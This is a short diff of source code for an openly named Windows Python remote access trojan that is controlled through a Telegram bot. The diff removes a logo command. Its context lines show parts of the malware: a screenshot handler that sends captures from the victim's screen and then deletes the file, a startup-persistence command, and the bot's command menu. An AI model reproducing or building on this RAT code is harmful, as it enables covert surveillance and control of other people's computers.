@@ -91,8 +91,6 @@ def help_method(bot , update):
9191[ /] /time
9292[12] Windows-Python-RAT GitHub.
9393[ /] /github
94- [13] Windows-Python-RAT Logo.
95- [ /] /logo
9694
9795@The404Hacking
9896Digital Security ReSearch Group
@@ -276,14 +274,6 @@ def screenshot_method(bot , update):
276274 photo .close ()
277275 os .system ("del C:\Windows\ScreenShot.png" )
278276
279- # /logo
280- def logo_method (bot , update ):
281- chat_id = update .message .chat_id
282- bot .sendMessage (chat_id , "Please Wait ..." )
283- chat_id = update .message .chat_id
284- photo = open ("Windows-Python-RAT.jpg" , "rb" )
285- bot .sendPhoto (chat_id ,photo ,"Windows-Python-RAT Logo !\n \n Help: /help\n @The404Hacking" )
286-
287277# /startup
288278def startup_method (bot , update ):
289279 chat_id = update .message .chat_id
@@ -350,8 +340,5 @@ def startup_method(bot , update):
350340github = CommandHandler ("github" , github_method )
351341update .dispatcher .add_handler (github )
352342
353- logo = CommandHandler ("logo" , logo_method )
354- update .dispatcher .add_handler (logo )
355-
356343update .start_polling ()
357344# ------------------------------------------------------------------------
0 commit comments